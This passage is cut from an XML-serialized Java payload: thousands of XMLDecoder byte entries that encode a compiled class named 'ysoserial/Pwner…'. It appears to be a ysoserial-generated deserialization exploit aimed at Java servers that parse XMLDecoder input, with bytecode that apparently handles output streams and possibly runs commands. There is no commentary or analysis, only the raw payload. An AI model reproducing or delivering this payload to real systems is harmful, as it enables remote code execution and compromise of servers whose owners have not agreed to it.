index="3237"><byte>47</byte></void><void index="3238"><byte>80</byte></void><void index="3239"><byte>114</byte></void><void index="3240"><byte>105</byte></void><void index="3241"><byte>110</byte></void><void index="3242"><byte>116</byte></void><void index="3243"><byte>83</byte></void><void index="3244"><byte>116</byte></void><void index="3245"><byte>114</byte></void><void index="3246"><byte>101</byte></void><void index="3247"><byte>97</byte></void><void index="3248"><byte>109</byte></void><void index="3249"><byte>59</byte></void><void index="3250"><byte>12</byte></void><void index="3251"><byte>0</byte></void><void index="3252"><byte>-88</byte></void><void index="3253"><byte>0</byte></void><void index="3254"><byte>-87</byte></void><void index="3255"><byte>9</byte></void><void index="3256"><byte>0</byte></void><void index="3257"><byte>107</byte></void><void index="3258"><byte>0</byte></void><void index="3259"><byte>-86</byte></void><void index="3260"><byte>1</byte></void><void index="3261"><byte>0</byte></void><void index="3262"><byte>19</byte></void><void index="3263"><byte>106</byte></void><void index="3264"><byte>97</byte></void><void index="3265"><byte>118</byte></void><void index="3266"><byte>97</byte></void><void index="3267"><byte>47</byte></void><void index="3268"><byte>108</byte></void><void index="3269"><byte>97</byte></void><void index="3270"><byte>110</byte></void><void index="3271"><byte>103</byte></void><void index="3272"><byte>47</byte></void><void index="3273"><byte>84</byte></void><void index="3274"><byte>104</byte></void><void index="3275"><byte>114</byte></void><void index="3276"><byte>111</byte></void><void index="3277"><byte>119</byte></void><void index="3278"><byte>97</byte></void><void index="3279"><byte>98</byte></void><void index="3280"><byte>108</byte></void><void index="3281"><byte>101</byte></void><void index="3282"><byte>7</byte></void><void index="3283"><byte>0</byte></void><void index="3284"><byte>-84</byte></void><void 
index="3285"><byte>10</byte></void><void index="3286"><byte>0</byte></void><void index="3287"><byte>-83</byte></void><void index="3288"><byte>0</byte></void><void index="3289"><byte>91</byte></void><void index="3290"><byte>1</byte></void><void index="3291"><byte>0</byte></void><void index="3292"><byte>19</byte></void><void index="3293"><byte>106</byte></void><void index="3294"><byte>97</byte></void><void index="3295"><byte>118</byte></void><void index="3296"><byte>97</byte></void><void index="3297"><byte>47</byte></void><void index="3298"><byte>105</byte></void><void index="3299"><byte>111</byte></void><void index="3300"><byte>47</byte></void><void index="3301"><byte>80</byte></void><void index="3302"><byte>114</byte></void><void index="3303"><byte>105</byte></void><void index="3304"><byte>110</byte></void><void index="3305"><byte>116</byte></void><void index="3306"><byte>83</byte></void><void index="3307"><byte>116</byte></void><void index="3308"><byte>114</byte></void><void index="3309"><byte>101</byte></void><void index="3310"><byte>97</byte></void><void index="3311"><byte>109</byte></void><void index="3312"><byte>7</byte></void><void index="3313"><byte>0</byte></void><void index="3314"><byte>-81</byte></void><void index="3315"><byte>1</byte></void><void index="3316"><byte>0</byte></void><void index="3317"><byte>7</byte></void><void index="3318"><byte>112</byte></void><void index="3319"><byte>114</byte></void><void index="3320"><byte>105</byte></void><void index="3321"><byte>110</byte></void><void index="3322"><byte>116</byte></void><void index="3323"><byte>108</byte></void><void index="3324"><byte>110</byte></void><void index="3325"><byte>12</byte></void><void index="3326"><byte>0</byte></void><void index="3327"><byte>-79</byte></void><void index="3328"><byte>0</byte></void><void index="3329"><byte>71</byte></void><void index="3330"><byte>10</byte></void><void index="3331"><byte>0</byte></void><void index="3332"><byte>-80</byte></void><void 
index="3333"><byte>0</byte></void><void index="3334"><byte>-78</byte></void><void index="3335"><byte>1</byte></void><void index="3336"><byte>0</byte></void><void index="3337"><byte>15</byte></void><void index="3338"><byte>112</byte></void><void index="3339"><byte>114</byte></void><void index="3340"><byte>105</byte></void><void index="3341"><byte>110</byte></void><void index="3342"><byte>116</byte></void><void index="3343"><byte>83</byte></void><void index="3344"><byte>116</byte></void><void index="3345"><byte>97</byte></void><void index="3346"><byte>99</byte></void><void index="3347"><byte>107</byte></void><void index="3348"><byte>84</byte></void><void index="3349"><byte>114</byte></void><void index="3350"><byte>97</byte></void><void index="3351"><byte>99</byte></void><void index="3352"><byte>101</byte></void><void index="3353"><byte>12</byte></void><void index="3354"><byte>0</byte></void><void index="3355"><byte>-76</byte></void><void index="3356"><byte>0</byte></void><void index="3357"><byte>11</byte></void><void index="3358"><byte>10</byte></void><void index="3359"><byte>0</byte></void><void index="3360"><byte>-83</byte></void><void index="3361"><byte>0</byte></void><void index="3362"><byte>-75</byte></void><void index="3363"><byte>1</byte></void><void index="3364"><byte>0</byte></void><void index="3365"><byte>13</byte></void><void index="3366"><byte>83</byte></void><void index="3367"><byte>116</byte></void><void index="3368"><byte>97</byte></void><void index="3369"><byte>99</byte></void><void index="3370"><byte>107</byte></void><void index="3371"><byte>77</byte></void><void index="3372"><byte>97</byte></void><void index="3373"><byte>112</byte></void><void index="3374"><byte>84</byte></void><void index="3375"><byte>97</byte></void><void index="3376"><byte>98</byte></void><void index="3377"><byte>108</byte></void><void index="3378"><byte>101</byte></void><void index="3379"><byte>1</byte></void><void index="3380"><byte>0</byte></void><void 
index="3381"><byte>29</byte></void><void index="3382"><byte>121</byte></void><void index="3383"><byte>115</byte></void><void index="3384"><byte>111</byte></void><void index="3385"><byte>115</byte></void><void index="3386"><byte>101</byte></void><void index="3387"><byte>114</byte></void><void index="3388"><byte>105</byte></void><void index="3389"><byte>97</byte></void><void index="3390"><byte>108</byte></void><void index="3391"><byte>47</byte></void><void index="3392"><byte>80</byte></void><void index="3393"><byte>119</byte></void><void index="3394"><byte>110</byte></void><void index="3395"><byte>101</byte></void><void index="3396"><byte>114</byte></void><void index="3397"><byte>52</byte></void><void index="3398"><byte>53</byte></void><void index="3399"><byte>52</byte></void><void index="3400"><byte>51</byte></void><void index="3401"><byte>56</byte></void><void index="3402"><byte>51</byte></void><void index="3403"><byte>49</byte></void><void index="3404"><byte>52</byte></void><void index="3405"><byte>50</byte></void><void index="3406"><byte>55</byte></void><void index="3407"><byte>56</byte></void><void index="3408"><byte>57</byte></void><void index="3409"><byte>57</byte></void><void index="3410"><byte>50</byte></void><void index="3411"><byte>1</byte></void><void index="3412"><byte>0</byte></void><void index="3413"><byte>31</byte></void><void index="3414"><byte>76</byte></void><void index="3415"><byte>121</byte></void><void index="3416"><byte>115</byte></void><void index="3417"><byte>111</byte></void><void index="3418"><byte>115</byte></void><void index="3419"><byte>101</byte></void><void index="3420"><byte>114</byte></void><void index="3421"><byte>105</byte></void><void index="3422"><byte>97</byte></void><void index="3423"><byte>108</byte></void><void index="3424"><byte>47</byte></void><void index="3425"><byte>80</byte></void><void index="3426"><byte>119</byte></void><void index="3427"><byte>110</byte></void><void index="3428"><byte>101</byte></void><void 
index="3429"><byte>114</byte></void><void index="3430"><byte>52</byte></void><void index="3431"><byte>53</byte></void><void index="3432"><byte>52</byte></void><void index="3433"><byte>51</byte></void><void index="3434"><byte>56</byte></void><void index="3435"><byte>51</byte></void><void index="3436"><byte>49</byte></void><void index="3437"><byte>52</byte></void><void index="3438"><byte>50</byte></void><void index="3439"><byte>55</byte></void><void index="3440"><byte>56</byte></void><void index="3441"><byte>57</byte></void><void index="3442"><byte>57</byte></void><void index="3443"><byte>50</byte></void><void index="3444"><byte>59</byte></void><void index="3445"><byte>0</byte></void><void index="3446"><byte>33</byte></void><void index="3447"><byte>0</byte></void><void index="3448"><byte>2</byte></void><void index="3449"><byte>0</byte></void><void index="3450"><byte>3</byte></void><void index="3451"><byte>0</byte></void><void index="3452"><byte>1</byte></void><void index="3453"><byte>0</byte></void><void index="3454"><byte>4</byte></void><void index="3455"><byte>0</byte></void><void index="3456"><byte>1</byte></void><void index="3457"><byte>0</byte></void><void index="3458"><byte>26</byte></void><void index="3459"><byte>0</byte></void><void index="3460"><byte>5</byte></void><void index="3461"><byte>0</byte></void><void index="3462"><byte>6</byte></void><void index="3463"><byte>0</byte></void><void index="3464"><byte>1</byte></void><void index="3465"><byte>0</byte></void><void index="3466"><byte>7</byte></void><void index="3467"><byte>0</byte></void><void index="3468"><byte>0</byte></void><void index="3469"><byte>0</byte></void><void index="3470"><byte>2</byte></void><void index="3471"><byte>0</byte></void><void index="3472"><byte>8</byte></void><void index="3473"><byte>0</byte></void><void index="3474"><byte>4</byte></void><void index="3475"><byte>0</byte></void><void index="3476"><byte>1</byte></void><void index="3477"><byte>0</byte></void><void 
index="3478"><byte>10</byte></void><void index="3479"><byte>0</byte></void><void index="3480"><byte>11</byte></void><void index="3481"><byte>0</byte></void><void index="3482"><byte>1</byte></void><void index="3483"><byte>0</byte></void><void index="3484"><byte>12</byte></void><void index="3485"><byte>0</byte></void><void index="3486"><byte>0</byte></void><void index="3487"><byte>0</byte></void><void index="3488"><byte>47</byte></void><void index="3489"><byte>0</byte></void><void index="3490"><byte>1</byte></void><void index="3491"><byte>0</byte></void><void index="3492"><byte>1</byte></void><void index="3493"><byte>0</byte></void><void index="3494"><byte>0</byte></void><void index="3495"><byte>0</byte></void><void index="3496"><byte>5</byte></void><void index="3497"><byte>42</byte></void><void index="3498"><byte>-73</byte></void><void index="3499"><byte>0</byte></void><void index="3500"><byte>1</byte></void><void index="3501"><byte>-79</byte></void><void index="3502"><byte>0</byte></void><void index="3503"><byte>0</byte></void><void index="3504"><byte>0</byte></void><void index="3505"><byte>2</byte></void><void index="3506"><byte>0</byte></void><void index="3507"><byte>13</byte></void><void index="3508"><byte>0</byte></void><void index="3509"><byte>0</byte></void><void index="3510"><byte>0</byte></void><void index="3511"><byte>6</byte></void><void index="3512"><byte>0</byte></void><void index="3513"><byte>1</byte></void><void index="3514"><byte>0</byte></void><void index="3515"><byte>0</byte></void><void index="3516"><byte>0</byte></void><void index="3517"><byte>47</byte></void><void index="3518"><byte>0</byte></void><void index="3519"><byte>14</byte></void><void index="3520"><byte>0</byte></void><void index="3521"><byte>0</byte></void><void index="3522"><byte>0</byte></void><void index="3523"><byte>12</byte></void><void index="3524"><byte>0</byte></void><void index="3525"><byte>1</byte></void><void index="3526"><byte>0</byte></void><void 
index="3527"><byte>0</byte></void><void index="3528"><byte>0</byte></void><void index="3529"><byte>5</byte></void><void index="3530"><byte>0</byte></void><void index="3531"><byte>15</byte></void><void index="3532"><byte>0</byte></void><void index="3533"><byte>-71</byte></void><void index="3534"><byte>0</byte></void><void index="3535"><byte>0</byte></void><void index="3536"><byte>0</byte></void><void index="3537"><byte>1</byte></void><void index="3538"><byte>0</byte></void><void index="3539"><byte>19</byte></void><void index="3540"><byte>0</byte></void><void index="3541"><byte>20</byte></void><void index="3542"><byte>0</byte></void><void index="3543"><byte>2</byte></void><void index="3544"><byte>0</byte></void><void index="3545"><byte>12</byte></void><void index="3546"><byte>0</byte></void><void index="3547"><byte>0</byte></void><void index="3548"><byte>0</byte></void><void index="3549"><byte>63</byte></void><void index="3550"><byte>0</byte></void><void index="3551"><byte>0</byte></void><void index="3552"><byte>0</byte></void><void index="3553"><byte>3</byte></void><void index="3554"><byte>0</byte></void><void index="3555"><byte>0</byte></void><void index="3556"><byte>0</byte></void><void index="3557"><byte>1</byte></void><void index="3558"><byte>-79</byte></void><void index="3559"><byte>0</byte></void><void index="3560"><byte>0</byte></void><void index="3561"><byte>0</byte></void><void index="3562"><byte>2</byte></void><void index="3563"><byte>0</byte></void><void index="3564"><byte>13</byte></void><void index="3565"><byte>0</byte></void><void index="3566"><byte>0</byte></void><void index="3567"><byte>0</byte></void><void index="3568"><byte>6</byte></void><void index="3569"><byte>0</byte></void><void index="3570"><byte>1</byte></void><void index="3571"><byte>0</byte></void><void index="3572"><byte>0</byte></void><void index="3573"><byte>0</byte></void><void index="3574"><byte>52</byte></void><void index="3575"><byte>0</byte></void><void 
index="3576"><byte>14</byte></void><void index="3577"><byte>0</byte></void><void index="3578"><byte>0</byte></void><void index="3579"><byte>0</byte></void><void index="3580"><byte>32</byte></void><void index="3581"><byte>0</byte></void><void index="3582"><byte>3</byte></void><void index="3583"><byte>0</byte></void><void index="3584"><byte>0</byte></void><void index="3585"><byte>0</byte></void><void index="3586"><byte>1</byte></void><void index="3587"><byte>0</byte></void><void index="3588"><byte>15</byte></void><void index="3589"><byte>0</byte></void><void index="3590"><byte>-71</byte></void><void index="3591"><byte>0</byte></void><void index="3592"><byte>0</byte></void><void index="3593"><byte>0</byte></void><void index="3594"><byte>0</byte></void><void index="3595"><byte>0</byte></void><void index="3596"><byte>1</byte></void><void index="3597"><byte>0</byte></void><void index="3598"><byte>21</byte></void><void index="3599"><byte>0</byte></void><void index="3600"><byte>22</byte></void><void index="3601"><byte>0</byte></void><void index="3602"><byte>1</byte></void><void index="3603"><byte>0</byte></void><void index="3604"><byte>0</byte></void><void index="3605"><byte>0</byte></void><void index="3606"><byte>1</byte></void><void index="3607"><byte>0</byte></void><void index="3608"><byte>23</byte></void><void index="3609"><byte>0</byte></void><void index="3610"><byte>24</byte></void><void index="3611"><byte>0</byte></void><void index="3612"><byte>2</byte></void><void index="3613"><byte>0</byte></void><void index="3614"><byte>25</byte></void><void index="3615"><byte>0</byte></void><void index="3616"><byte>0</byte></void><void index="3617"><byte>0</byte></void><void index="3618"><byte>4</byte></void><void index="3619"><byte>0</byte></void><void index="3620"><byte>1</byte></void><void index="3621"><byte>0</byte></void><void index="3622"><byte>26</byte></void><void index="3623"><byte>0</byte></void><void index="3624"><byte>1</byte></void><void 
index="3625"><byte>0</byte></void><void index="3626"><byte>19</byte></void><void index="3627"><byte>0</byte></void><void index="3628"><byte>27</byte></void><void index="3629"><byte>0</byte></void><void index="3630"><byte>2</byte></void><void index="3631"><byte>0</byte></void><void index="3632"><byte>12</byte></void><void index="3633"><byte>0</byte></void><void index="3634"><byte>0</byte></void><void index="3635"><byte>0</byte></void><void index="3636"><byte>73</byte></void><void index="3637"><byte>0</byte></void><void index="3638"><byte>0</byte></void><void index="3639"><byte>0</byte></void><void index="3640"><byte>4</byte></void><void index="3641"><byte>0</byte></void><void index="3642"><byte>0</byte></void><void index="3643"><byte>0</byte></void><void index="3644"><byte>1</byte></void><void index="3645"><byte>-79</byte></void><void index="3646"><byte>0</byte></void><void index="3647"><byte>0</byte></void><void index="3648"><byte>0</byte></void><void index="3649"><byte>2</byte></void><void index="3650"><byte>0</byte></void><void index="3651"><byte>13</byte></void><void index="3652"><byte>0</byte></void><void index="3653"><byte>0</byte></void><void index="3654"><byte>0</byte></void><void index="3655"><byte>6</byte></void><void index="3656"><byte>0</byte></void><void index="3657"><byte>1</byte></void><void index="3658"><byte>0</byte></void><void index="3659"><byte>0</byte></void><void index="3660"><byte>0</byte></void><void index="3661"><byte>56</byte></void><void index="3662"><byte>0</byte></void><void index="3663"><byte>14</byte></void><void index="3664"><byte>0</byte></void><void index="3665"><byte>0</byte></void><void index="3666"><byte>0</byte></void><void index="3667"><byte>42</byte></void><void index="3668"><byte>0</byte></void><void index="3669"><byte>4</byte></void><void index="3670"><byte>0</byte></void><void index="3671"><byte>0</byte></void><void index="3672"><byte>0</byte></void><void index="3673"><byte>1</byte></void><void 
index="3674"><byte>0</byte></void><void index="3675"><byte>15</byte></void><void index="3676"><byte>0</byte></void><void index="3677"><byte>-71</byte></void><void index="3678"><byte>0</byte></void><void index="3679"><byte>0</byte></void><void index="3680"><byte>0</byte></void><void index="3681"><byte>0</byte></void><void index="3682"><byte>0</byte></void><void index="3683"><byte>1</byte></void><void index="3684"><byte>0</byte></void><void index="3685"><byte>21</byte></void><void index="3686"><byte>0</byte></void><void index="3687"><byte>22</byte></void><void index="3688"><byte>0</byte></void><void index="3689"><byte>1</byte></void><void index="3690"><byte>0</byte></void><void index="3691"><byte>0</byte></void><void index="3692"><byte>0</byte></void><void index="3693"><byte>1</byte></void><void index="3694"><byte>0</byte></void><void index="3695"><byte>28</byte></void><void index="3696"><byte>0</byte></void><void index="3697"><byte>29</byte></void><void index="3698"><byte>0</byte></void><void index="3699"><byte>2</byte></void><void index="3700"><byte>0</byte></void><void index="3701"><byte>0</byte></void><void index="3702"><byte>0</byte></void><void index="3703"><byte>1</byte></void><void index="3704"><byte>0</byte></void><void index="3705"><byte>30</byte></void><void index="3706"><byte>0</byte></void><void index="3707"><byte>31</byte></void><void index="3708"><byte>0</byte></void><void index="3709"><byte>3</byte></void><void index="3710"><byte>0</byte></void><void index="3711"><byte>25</byte></void><void index="3712"><byte>0</byte></void><void index="3713"><byte>0</byte></void><void index="3714"><byte>0</byte></void><void index="3715"><byte>4</byte></void><void index="3716"><byte>0</byte></void><void index="3717"><byte>1</byte></void><void index="3718"><byte>0</byte></void><void index="3719"><byte>26</byte></void><void index="3720"><byte>0</byte></void><void index="3721"><byte>8</byte></void><void index="3722"><byte>0</byte></void><void 
index="3723"><byte>41</byte></void><void index="3724"><byte>0</byte></void><void index="3725"><byte>11</byte></void><void index="3726"><byte>0</byte></void><void index="3727"><byte>1</byte></void><void index="3728"><byte>0</byte></void><void index="3729"><byte>12</byte></void><void index="3730"><byte>0</byte></void><void index="3731"><byte>0</byte></void><void index="3732"><byte>1</byte></void><void index="3733"><byte>114</byte></void><void index="3734"><byte>0</byte></void><void index="3735"><byte>7</byte></void><void index="3736"><byte>0</byte></void><void index="3737"><byte>11</byte></void><void index="3738"><byte>0</byte></void><void index="3739"><byte>0</byte></void><void index="3740"><byte>1</byte></void><void index="3741"><byte>18</byte></void><void index="3742"><byte>-89</byte></void><void index="3743"><byte>0</byte></void><void index="3744"><byte>3</byte></void><void index="3745"><byte>1</byte></void><void index="3746"><byte>76</byte></void><void index="3747"><byte>-72</byte></void><void index="3748"><byte>0</byte></void><void index="3749"><byte>47</byte></void><void index="3750"><byte>-64</byte></void><void index="3751"><byte>0</byte></void><void index="3752"><byte>49</byte></void><void index="3753"><byte>-74</byte></void><void index="3754"><byte>0</byte></void><void index="3755"><byte>53</byte></void><void index="3756"><byte>-64</byte></void><void index="3757"><byte>0</byte></void><void index="3758"><byte>55</byte></void><void index="3759"><byte>18</byte></void><void index="3760"><byte>57</byte></void><void index="3761"><byte>-74</byte></void><void index="3762"><byte>0</byte></void><void index="3763"><byte>61</byte></void><void index="3764"><byte>77</byte></void><void index="3765"><byte>-72</byte></void><void index="3766"><byte>0</byte></void><void index="3767"><byte>47</byte></void><void index="3768"><byte>-64</byte></void><void index="3769"><byte>0</byte></void><void index="3770"><byte>49</byte></void><void index="3771"><byte>-74</byte></void><void 
index="3772"><byte>0</byte></void><void index="3773"><byte>53</byte></void><void index="3774"><byte>-64</byte></void><void index="3775"><byte>0</byte></void><void index="3776"><byte>55</byte></void><void index="3777"><byte>-74</byte></void><void index="3778"><byte>0</byte></void><void index="3779"><byte>65</byte></void><void index="3780"><byte>78</byte></void><void index="3781"><byte>45</byte></void><void index="3782"><byte>18</byte></void><void index="3783"><byte>67</byte></void><void index="3784"><byte>-74</byte></void><void index="3785"><byte>0</byte></void><void index="3786"><byte>73</byte></void><void index="3787"><byte>45</byte></void><void index="3788"><byte>-74</byte></void><void index="3789"><byte>0</byte></void><void index="3790"><byte>77</byte></void><void index="3791"><byte>58</byte></void><void index="3792"><byte>4</byte></void><void index="3793"><byte>25</byte></void><void index="3794"><byte>4</byte></void><void index="3795"><byte>-69</byte></void><void index="3796"><byte>0</byte></void><void index="3797"><byte>79</byte></void><void index="3798"><byte>89</byte></void><void index="3799"><byte>-69</byte></void><void index="3800"><byte>0</byte></void><void index="3801"><byte>81</byte></void><void index="3802"><byte>89</byte></void><void index="3803"><byte>-73</byte></void><void index="3804"><byte>0</byte></void><void index="3805"><byte>82</byte></void><void index="3806"><byte>44</byte></void><void index="3807"><byte>-74</byte></void><void index="3808"><byte>0</byte></void><void index="3809"><byte>86</byte></void><void index="3810"><byte>18</byte></void><void index="3811"><byte>88</byte></void><void index="3812"><byte>-74</byte></void><void index="3813"><byte>0</byte></void><void index="3814"><byte>86</byte></void><void index="3815"><byte>-74</byte></void><void index="3816"><byte>0</byte></void><void index="3817"><byte>92</byte></void><void index="3818"><byte>-73</byte></void><void index="3819"><byte>0</byte></void><void 
index="3820"><byte>94</byte></void><void index="3821"><byte>-74</byte></void><void index="3822"><byte>0</byte></void><void index="3823"><byte>100</byte></void><void index="3824"><byte>25</byte></void><void index="3825"><byte>4</byte></void><void index="3826"><byte>-74</byte></void><void index="3827"><byte>0</byte></void><void index="3828"><byte>103</byte></void><void index="3829"><byte>18</byte></void><void index="3830"><byte>105</byte></void><void index="3831"><byte>-72</byte></void><void index="3832"><byte>0</byte></void><void index="3833"><byte>110</byte></void><void index="3834"><byte>58</byte></void><void index="3835"><byte>5</byte></void><void index="3836"><byte>25</byte></void><void index="3837"><byte>5</byte></void><void index="3838"><byte>1</byte></void><void index="3839"><byte>-91</byte></void><void index="3840"><byte>0</byte></void><void index="3841"><byte>16</byte></void><void index="3842"><byte>25</byte></void><void index="3843"><byte>5</byte></void><void index="3844"><byte>-74</byte></void><void index="3845"><byte>0</byte></void><void index="3846"><byte>115</byte></void><void index="3847"><byte>18</byte></void><void index="3848"><byte>117</byte></void><void index="3849"><byte>-74</byte></void><void index="3850"><byte>0</byte></void><void index="3851"><byte>121</byte></void><void index="3852"><byte>-102</byte></void><void index="3853"><byte>0</byte></void><void index="3854"><byte>6</byte></void><void index="3855"><byte>-89</byte></void><void index="3856"><byte>0</byte></void><void index="3857"><byte>33</byte></void><void index="3858"><byte>-72</byte></void><void index="3859"><byte>0</byte></void><void index="3860"><byte>127</byte></void><void index="3861"><byte>-69</byte></void><void index="3862"><byte>0</byte></void><void index="3863"><byte>81</byte></void><void index="3864"><byte>89</byte></void><void index="3865"><byte>-73</byte></void><void index="3866"><byte>0</byte></void><void index="3867"><byte>82</byte></void><void 
index="3868"><byte>18</byte></void><void index="3869"><byte>-127</byte></void><void index="3870"><byte>-74</byte></void><void index="3871"><byte>0</byte></void><void index="3872"><byte>86</byte></void><void index="3873"><byte>44</byte></void><void index="3874"><byte>-74</byte></void><void index="3875"><byte>0</byte></void><void index="3876"><byte>86</byte></void><void index="3877"><byte>-74</byte></void><void index="3878"><byte>0</byte></void><void index="3879"><byte>92</byte></void><void index="3880"><byte>-74</byte></void><void index="3881"><byte>0</byte></void><void index="3882"><byte>-123</byte></void><void index="3883"><byte>58</byte></void><void index="3884"><byte>6</byte></void><void index="3885"><byte>-89</byte></void><void index="3886"><byte>0</byte></void><void index="3887"><byte>30</byte></void><void index="3888"><byte>-72</byte></void><void index="3889"><byte>0</byte></void><void index="3890"><byte>127</byte></void><void index="3891"><byte>-69</byte></void><void index="3892"><byte>0</byte></void><void index="3893"><byte>81</byte></void><void index="3894"><byte>89</byte></void><void index="3895"><byte>-73</byte></void><void index="3896"><byte>0</byte></void><void index="3897"><byte>82</byte></void><void index="3898"><byte>18</byte></void><void index="3899"><byte>-121</byte></void><void index="3900"><byte>-74</byte></void><void index="3901"><byte>0</byte></void><void index="3902"><byte>86</byte></void><void index="3903"><byte>44</byte></void><void index="3904"><byte>-74</byte></void><void index="3905"><byte>0</byte></void><void index="3906"><byte>86</byte></void><void index="3907"><byte>-74</byte></void><void index="3908"><byte>0</byte></void><void index="3909"><byte>92</byte></void><void index="3910"><byte>-74</byte></void><void index="3911"><byte>0</byte></void><void index="3912"><byte>-123</byte></void><void index="3913"><byte>58</byte></void><void index="3914"><byte>6</byte></void><void index="3915"><byte>-69</byte></void><void 
index="3916"><byte>0</byte></void><void index="3917"><byte>-119</byte></void><void index="3918"><byte>89</byte></void><void index="3919"><byte>-69</byte></void><void index="3920"><byte>0</byte></void><void index="3921"><byte>-117</byte></void><void index="3922"><byte>89</byte></void><void index="3923"><byte>25</byte></void><void index="3924"><byte>6</byte></void><void index="3925"><byte>-74</byte></void><void index="3926"><byte>0</byte></void><void index="3927"><byte>-111</byte></void><void index="3928"><byte>18</byte></void><void index="3929"><byte>67</byte></void><void index="3930"><byte>-73</byte></void><void index="3931"><byte>0</byte></void><void index="3932"><byte>-108</byte></void><void index="3933"><byte>-73</byte></void><void index="3934"><byte>0</byte></void><void index="3935"><byte>-105</byte></void><void index="3936"><byte>58</byte></void><void index="3937"><byte>7</byte></void><void index="3938"><byte>1</byte></void><void index="3939"><byte>58</byte></void><void index="3940"><byte>8</byte></void><void index="3941"><byte>18</byte></void><void index="3942"><byte>-103</byte></void><void index="3943"><byte>58</byte></void><void index="3944"><byte>9</byte></void><void index="3945"><byte>-89</byte></void><void index="3946"><byte>0</byte></void><void index="3947"><byte>25</byte></void><void index="3948"><byte>-69</byte></void><void index="3949"><byte>0</byte></void><void index="3950"><byte>81</byte></void><void index="3951"><byte>89</byte></void><void index="3952"><byte>-73</byte></void><void index="3953"><byte>0</byte></void><void index="3954"><byte>82</byte></void><void index="3955"><byte>25</byte></void><void index="3956"><byte>9</byte></void><void index="3957"><byte>-74</byte></void><void index="3958"><byte>0</byte></void><void index="3959"><byte>86</byte></void><void index="3960"><byte>25</byte></void><void index="3961"><byte>8</byte></void><void index="3962"><byte>-74</byte></void><void index="3963"><byte>0</byte></void><void 
index="3964"><byte>86</byte></void><void index="3965"><byte>-74</byte></void><void index="3966"><byte>0</byte></void><void index="3967"><byte>92</byte></void><void index="3968"><byte>58</byte></void><void index="3969"><byte>9</byte></void><void index="3970"><byte>25</byte></void><void index="3971"><byte>7</byte></void><void index="3972"><byte>-74</byte></void><void index="3973"><byte>0</byte></void><void index="3974"><byte>-100</byte></void><void index="3975"><byte>89</byte></void><void index="3976"><byte>58</byte></void><void index="3977"><byte>8</byte></void><void index="3978"><byte>1</byte></void><void index="3979"><byte>-90</byte></void><void index="3980"><byte>-1</byte></void><void index="3981"><byte>-31</byte></void><void index="3982"><byte>45</byte></void><void index="3983"><byte>-74</byte></void><void index="3984"><byte>0</byte></void><void index="3985"><byte>-96</byte></void><void index="3986"><byte>25</byte></void><void index="3987"><byte>9</byte></void><void index="3988"><byte>-74</byte></void><void index="3989"><byte>0</byte></void><void index="3990"><byte>-91</byte></void><void index="3991"><byte>-89</byte></void><void index="3992"><byte>0</byte></void><void index="3993"><byte>24</byte></void><void index="3994"><byte>58</byte></void><void index="3995"><byte>10</byte></void><void index="3996"><byte>-78</byte></void><void index="3997"><byte>0</byte></void><void index="3998"><byte>-85</byte></void><void index="3999"><byte>25</byte></void><void index="4000"><byte>10</byte></void><void index="4001"><byte>-74</byte></void><void index="4002"><byte>0</byte></void><void index="4003"><byte>-82</byte></void><void index="4004"><byte>-74</byte></void><void index="4005"><byte>0</byte></void><void index="4006"><byte>-77</byte></void><void index="4007"><byte>25</byte></void><void index="4008"><byte>10</byte></void><void index="4009"><byte>-74</byte></void><void index="4010"><byte>0</byte></void><void index="4011"><byte>-74</byte></void><void 
index="4012"><byte>-89</byte></void><void index="4013"><byte>0</byte></void><void index="4014"><byte>3</byte></void><void index="4015"><byte>-79</byte></void><void index="4016"><byte>0</byte></void><void index="4017"><byte>1</byte></void><void index="4018"><byte>0</byte></void><void index="4019"><byte>94</byte></void><void index="4020"><byte>0</byte></void><void index="4021"><byte>-7</byte></void><void index="4022"><byte>0</byte></void><void index="4023"><byte>-4</byte></void><void index="4024"><byte>0</byte></void><void index="4025"><byte>-89</byte></void><void index="4026"><byte>0</byte></void><void index="4027"><byte>1</byte></void><void index="4028"><byte>0</byte></void><void index="4029"><byte>-73</byte></void><void index="4030"><byte>0</byte></void><void index="4031"><byte>0</byte></void><void index="4032"><byte>0</byte></void><void index="4033"><byte>70</byte></void><void index="4034"><byte>0</byte></void><void index="4035"><byte>9</byte></void><void index="4036"><byte>3</byte></void><void index="4037"><byte>-1</byte></void><void index="4038"><byte>0</byte></void><void index="4039"><byte>109</byte></void><void index="4040"><byte>0</byte></void><void index="4041"><byte>6</byte></void><void index="4042"><byte>0</byte></void><void index="4043"><byte>5</byte></void><void index="4044"><byte>7</byte></void><void index="4045"><byte>0</byte></void><void index="4046"><byte>112</byte></void><void index="4047"><byte>7</byte></void><void index="4048"><byte>0</byte></void><void index="4049"><byte>69</byte></void><void index="4050"><byte>7</byte></void><void index="4051"><byte>0</byte></void><void index="4052"><byte>96</byte></void><void index="4053"><byte>7</byte></void><void index="4054"><byte>0</byte></void><void index="4055"><byte>112</byte></void><void index="4056"><byte>0</byte></void><void index="4057"><byte>0</byte></void><void index="4058"><byte>2</byte></void><void index="4059"><byte>29</byte></void><void index="4060"><byte>-4</byte></void><void 
index="4061"><byte>0</byte></void><void index="4062"><byte>26</byte></void><void index="4063"><byte>7</byte></void><void index="4064"><byte>0</byte></void><void index="4065"><byte>-115</byte></void><void index="4066"><byte>-2</byte></void><void index="4067"><byte>0</byte></void><void index="4068"><byte>32</byte></void><void index="4069"><byte>7</byte></void><void index="4070"><byte>0</byte></void><void index="4071"><byte>-119</byte></void><void index="4072"><byte>7</byte></void><void index="4073"><byte>0</byte></void><void index="4074"><byte>112</byte></void><void index="4075"><byte>7</byte></void><void index="4076"><byte>0</byte></void><void index="4077"><byte>112</byte></void><void index="4078"><byte>21</byte></void><void index="4079"><byte>-1</byte></void><void index="4080"><byte>0</byte></void><void index="4081"><byte>23</byte></void><void index="4082"><byte>0</byte></void><void index="4083"><byte>6</byte></void><void index="4084"><byte>0</byte></void><void index="4085"><byte>5</byte></void><void index="4086"><byte>7</byte></void><void index="4087"><byte>0</byte></void><void index="4088"><byte>112</byte></void><void index="4089"><byte>7</byte></void><void index="4090"><byte>0</byte></void><void index="4091"><byte>69</byte></void><void index="4092"><byte>7</byte></void><void index="4093"><byte>0</byte></void><void index="4094"><byte>96</byte></void><void index="4095"><byte>7</byte></void><void index="4096"><byte>0</byte></void><void index="4097"><byte>112</byte></void><void index="4098"><byte>0</byte></void><void index="4099"><byte>1</byte></void><void index="4100"><byte>7</byte></void><void index="4101"><byte>0</byte></void><void index="4102"><byte>-89</byte></void><void index="4103"><byte>20</byte></void><void index="4104"><byte>0</byte></void><void index="4105"><byte>2</byte></void><void index="4106"><byte>0</byte></void><void index="4107"><byte>32</byte></void><void index="4108"><byte>0</byte></void><void index="4109"><byte>0</byte></void><void 
